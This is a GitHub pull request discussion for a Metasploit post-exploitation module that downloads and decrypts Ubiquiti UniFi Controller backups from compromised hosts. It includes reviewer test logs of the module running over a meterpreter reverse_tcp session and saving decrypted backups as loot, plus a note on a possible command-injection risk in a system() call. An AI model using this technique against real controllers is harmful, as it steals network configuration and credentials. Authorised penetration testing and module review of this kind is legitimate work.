-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
unifi backup downloader #11548
unifi backup downloader #11548
Conversation
I believe the established approach is to cry. Something like this:
The obvious attack vectors are local. No obvious remote vector, as the path and arguments are fully controlled by Metasploit A couple of things stand out, but may prove to be non-issues:
|
It isn't a password protected zip, its an AES encrypted zip. If I didn't document that clearly, i definitely can adjust. to be clear, the database file needs the following: First things first, get files. Once this lands, I'll work on a db parser. |
Default backup path on macOS is |
Sorry wrong button, should not have closed :-( |
Thanks @jmartin-r7 . Added osx to the code, however w/o a box to test with, someone will need to test that portion. |
Travis error isn't related to this PR code:
|
delayed until I can test on a mac |
OSX testing completed, this is ready for review. |
ping anyone with unify, this has been ready for review for a month and its framework friday :) |
Just tested against 5.10.23 (latest) and still working. I did notice though that when on a |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This works and I can land as is if desire is to defer on enhancements I have noted.
|
||
# https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation | ||
sprop_locations.each do |sprop| | ||
next unless exists?(sprop) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
From testing.
Might be worth adding some detail here when no locations result in data.
On a windows system with no backup stored the module reported accessing system.properties
and did then complete. When no backup exists may be worth a status.
I also noted on Linux when the session user does not have read access to system.properties
path there is no detail reported.
Same linux target:
session as regular user
msf5 payload(linux/x64/meterpreter/reverse_tcp) > use post/multi/gather/ubiquiti_unifi_backup
msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1
session => 1
msf5 post(multi/gather/ubiquiti_unifi_backup) > run
[*] Post module execution completed
msf5 post(multi/gather/ubiquiti_unifi_backup) > exit
session as root
msf5 payload(linux/x64/meterpreter/reverse_tcp) > use post/multi/gather/ubiquiti_unifi_backup
msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1
session => 1
msf5 post(multi/gather/ubiquiti_unifi_backup) > run
[+] Read UniFi Controller file /var/lib/unifi/system.properties
[+] File /var/lib/unifi/backup/5.10.23.unf saved to /home/msfuser/.msf4/loot/20190514173003_default_192.168.17.102_ubiquiti.unifi.b_530890.unf
[+] File 5.10.23.unf DECRYPTED and saved to /home/msfuser/.msf4/loot/20190514173003_default_192.168.17.102_ubiquiti.unifi.b_721128.zip. File needs to be repair via `zip -FF`
[*] Attempting to repair zip file (this is normal)
[+] File /var/lib/unifi/backup/5.10.23.unf DECRYPTED and REPAIRED and saved to /home/msfuser/.msf4/loot/20190514173004_default_192.168.17.102_ubiquiti.unifi.b_058997.zip.
[+] File /var/lib/unifi/backup/autobackup/autobackup_5.10.23_20190514_1725_1557854700012.unf saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_558645.unf
[+] File autobackup_5.10.23_20190514_1725_1557854700012.unf DECRYPTED and saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_491301.zip. File needs to be repair via `zip -FF`
[*] Attempting to repair zip file (this is normal)
[+] File /var/lib/unifi/backup/autobackup/autobackup_5.10.23_20190514_1725_1557854700012.unf DECRYPTED and REPAIRED and saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_438546.zip.
[*] Post module execution completed
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'd agree with you, looks like i went too 'linux' style and made everything verbose printing. I'll add a few prints for more detail.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Added two prints, one for when reading system.properties
files, and one for when trying to read data. I could add another one for 'no data was found' as well if you'd think it to be beneficial
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This works, thanks.
Release Notes
|
Thanks @jmartin-r7 |
Post module to run against Ubiquiti Unifi Controllers to download any backup or autobackup files.
These files are.... annoying. They have a .unf extension but are AES encrypted zip files. Luckily, its a known key so we decrypt it. The files then need to be repaired,
zip
has-FF
to do this (and it works), however the rubyzip
gems dont have this. So ifzip
is available on the system (aka nix and maybe osx), we repair the file as well. If a repair doesn't happen, 7zip may work, but haven't tried.See docs for install instructions, and verification steps.
@bcoles there is a
system
call in here, the module provides all input, can you think of an RCE possible on this? I thought maybe if your target was something with ticks in it maybe, but also couldn't think of a better way to do the call. Open to help and suggestions!